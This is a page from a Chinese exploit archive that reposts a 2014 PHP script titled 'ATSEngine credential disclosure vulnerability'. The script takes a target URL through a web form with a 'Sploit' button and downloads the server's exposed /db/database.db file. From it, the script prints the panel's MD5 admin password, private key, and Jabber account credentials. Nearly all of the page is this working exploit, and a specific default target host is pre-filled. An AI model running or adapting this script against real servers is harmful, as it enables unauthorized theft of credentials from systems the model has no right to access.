首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ATSEngine credential disclosure vulnerability
来源:vfocus.net 作者:Xylitol 发布时间:2014-04-22  
<?php
    $url = getURL();
      
    if ($url !== NULL) {
        $database = @file_get_contents($url . '/db/database.db');
          
        if ($database !== FALSE) {
            file_put_contents('tmp.db', $database);
              
            $password_md5     = getOption('password_md5');
            $pkey             = getOption('pkey');
            $jabber_on        = getOption('jabber_on');
            $jabber_sender    = getOption('jabber_sender');
            $jabber_password  = getOption('jabber_password');
            $jabber_port      = getOption('jabber_port');
            $jabber_recipient = getOption('jabber_recepient');
              
            writeLine('URL:          ' . htmlentities($url));
            writeLine('MD5 password: ' . htmlentities($password_md5));
            writeLine('pkey:         ' . htmlentities($pkey));
            writeLine('Jabber        ' . htmlentities($jabber_on));
            writeLine('Sender:       ' . htmlentities($jabber_sender));
            writeLine('Password:     ' . htmlentities($jabber_password));
            writeLine('Port:         ' . htmlentities($jabber_port));
            writeLine('Recipient:    ' . htmlentities($jabber_recipient));
              
            unlink('tmp.db');
        }
        else {
            writeLine('Cannot get database...');
        }
          
        writeLine('');
        echo('<a href="' . basename($_SERVER['PHP_SELF']) . '">Back</a>');
    }
    else {
?>
<form method="POST">
<label for="url">URL:</label> <input id="url" name="url" type="url" value="http://secureserver02792.com/bncadmin/" />
<input type="submit" value="Sploit" />
</form>
<?php
    }
      
    function getURL() {
        global $_POST;
          
        if (isset($_POST['url'])      &&
            !is_array($_POST['url'])  &&
            is_string($_POST['url'])  &&
            strlen($_POST['url']) > 0 &&
            filter_var($_POST['url'], FILTER_VALIDATE_URL)) {
            return $_POST['url'];
        }
          
        return NULL;
    }
      
    function writeLine($str) {
        echo($str . "\n");
    }
      
    function getOption($option) {
        $db     = new SQLite3('tmp.db');
        $sql    = 'SELECT value AS result FROM options WHERE param="' . $option . '"';
        $result = $db-> querySingle($sql, true);
          
        $db-> close();
          
        return sizeof($result) > 0 ? $result['result'] : '';
    }
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Flash Player Regular Exp
·Media Player Classic 1.3.1752.
·Linux group_info refcounter -
·No-CMS 0.6.6 rev 1 - Admin Acc
·Sercomm TCP/32674 Backdoor Rea
·Bonefire v.0.7.1 - Reinstall A
·Nagios Remote Plugin Executor
·Acunetix 8 build 20120704 - Re
·Ruby OpenSSL Private Key Spoof
·Acunetix 8 Scanner Buffer Over
·Jzip SEH Unicode Buffer Overfl
·mRemote Offline Password Decry
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved